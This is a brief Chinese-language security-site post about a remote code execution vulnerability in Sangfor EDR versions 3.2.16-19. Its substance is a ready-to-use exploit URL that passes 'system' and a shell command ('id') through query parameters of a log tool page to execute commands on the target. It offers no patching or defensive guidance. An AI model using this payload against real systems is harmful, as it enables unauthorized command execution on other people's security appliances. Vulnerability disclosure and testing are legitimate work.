深信服EDR(v3.2.16-19)远程代码执行漏洞

发表评论
193 views

A+

所属分类：安全文章安全漏洞

漏洞详情

访问一下深信服EDR，显示登陆界面

https://IP:PORT/ui/login.php

深信服EDR(v3.2.16-19)远程代码执行漏洞

此时我们把URL改成如下，即可实现远程代码执行

https://IP:PORT/ui/login.php/tool/log/c.php?strip_slashes=system&host=id

深信服EDR(v3.2.16-19)远程代码执行漏洞

版权声明：本站收录文章，于2020年9月14日10:49:38，由 admin 发表，共 144 字。
转载请注明：深信服EDR(v3.2.16-19)远程代码执行漏洞 | CN-SEC 中文网

发表评论取消回复

文章目录
繁